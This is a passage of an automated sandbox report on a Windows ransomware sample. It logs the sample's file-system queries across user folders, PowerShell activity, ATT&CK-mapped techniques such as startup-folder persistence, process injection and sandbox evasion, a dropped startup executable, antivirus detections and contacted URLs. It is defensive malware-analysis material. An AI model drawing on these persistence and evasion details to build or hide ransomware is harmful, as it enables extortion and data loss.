Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\BWDRWEEARI.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\BXAJUJAOEO VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\BXAJUJAOEO\BQJUWOYRTO.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\BXAJUJAOEO\BXAJUJAOEO.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\BXAJUJAOEO\DQOFHVHTMG.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\BXAJUJAOEO\LHEPQPGEWF.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\BXAJUJAOEO.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\DQOFHVHTMG\PWZOQIFCAN.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\DQOFHVHTMG\IZMFBFKMEB.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\DQOFHVHTMG\UBVUNTSCZJ.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\DQOFHVHTMG\WHZAGPPPLA.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\DQOFHVHTMG.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Music VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Videos VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\UBVUNTSCZJ.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\PWZOQIFCAN.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\WHZAGPPPLA.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Pictures\Camera Roll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Music VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Downloads VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Downloads\BQJUWOYRTO.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Downloads\BWDRWEEARI.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Downloads\BXAJUJAOEO.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Downloads\DQOFHVHTMG.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Downloads\DQOFHVHTMG.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Downloads\LHEPQPGEWF.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Downloads\IZMFBFKMEB.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Downloads\PWZOQIFCAN.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Downloads\UBVUNTSCZJ.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Downloads\PWZOQIFCAN.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Downloads\WHZAGPPPLA.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\BXAJUJAOEO\BXAJUJAOEO.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\DUKNXICOZT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\DQOFHVHTMG.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\Excel 2016.lnk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\FAAGWHBVUU.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\GNLQNHOLWB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\GNLQNHOLWB.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\IJht2pqbVh.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\LHEPQPGEWF\BQJUWOYRTO.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\DQOFHVHTMG\BWDRWEEARI.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\DQOFHVHTMG\DQOFHVHTMG.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\DQOFHVHTMG VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\LHEPQPGEWF.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\IZMFBFKMEB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\DQOFHVHTMG.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\DUKNXICOZT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\IZMFBFKMEB.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\GNLQNHOLWB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\OVWVVIANZH VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\PWZOQIFCAN.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Downloads\NIRMEKAMZH.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\File Explorer.lnk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\LHEPQPGEWF\BUFZSQPCOH.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\LHEPQPGEWF\GNLQNHOLWB.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\LHEPQPGEWF\FAAGWHBVUU.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\LHEPQPGEWF\LHEPQPGEWF.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\Microsoft Edge.lnk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\NIRMEKAMZH.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\BUFZSQPCOH.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\OVWVVIANZH VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\BQJUWOYRTO.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\BXAJUJAOEO\BQJUWOYRTO.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\BXAJUJAOEO\DQOFHVHTMG.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\BXAJUJAOEO\PWZOQIFCAN.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\IZMFBFKMEB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\LHEPQPGEWF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\LHEPQPGEWF.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\LHEPQPGEWF.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\BXAJUJAOEO\NIRMEKAMZH.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\BXAJUJAOEO\PWZOQIFCAN.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\NIRMEKAMZH.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\Word 2016.lnk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\PWZOQIFCAN.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\BQJUWOYRTO.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\BXAJUJAOEO.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\BXAJUJAOEO\NIRMEKAMZH.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\BXAJUJAOEO\LHEPQPGEWF.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\BXAJUJAOEO VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Desktop\LHEPQPGEWF\NIRMEKAMZH.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\NIRMEKAMZH.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\IJht2pqbVh.exe	Queries volume information: C:\Users\user\Documents\20210411\PowerShell_transcript.134349.u5P0y+fn.20210411125637.txt VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\IJht2pqbVh.exe

Code function: 0_2_00007FF606EC1680 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF606EC1680

Source: C:\Users\user\Desktop\IJht2pqbVh.exe

Code function: 0_2_00007FF606E33E40 GetUserNameW,

0_2_00007FF606E33E40

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Startup Items1	Startup Items1	Disable or Modify Tools1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Default Accounts	Scripting1	Registry Run Keys / Startup Folder12	Process Injection11	Deobfuscate/Decode Files or Information1	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Native API1	Logon Script (Windows)	Registry Run Keys / Startup Folder12	Scripting1	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	PowerShell1	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	System Information Discovery32	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	File Deletion1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading1	Cached Domain Credentials	Security Software Discovery131	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion41	DCSync	Process Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection11	Proc Filesystem	Virtualization/Sandbox Evasion41	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Application Window Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	System Owner/User Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
IJht2pqbVh.exe	49%	Virustotal		Browse
IJht2pqbVh.exe	27%	Metadefender		Browse
IJht2pqbVh.exe	62%	ReversingLabs	Win64.Ransomware.Genasom

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	27%	Metadefender		Browse
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe	62%	ReversingLabs	Win64.Ransomware.Genasom

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://crl.m	0%	URL Reputation	safe
http://crl.m	0%	URL Reputation	safe
http://crl.m	0%	URL Reputation	safe
https://2no.co/2DetN5	0%	Avira URL Cloud	safe
http://www.myip.ch	0%	Avira URL Cloud	safe
https://go.micros	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://curl.se/docs/http-cookies.html	0%	Avira URL Cloud	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
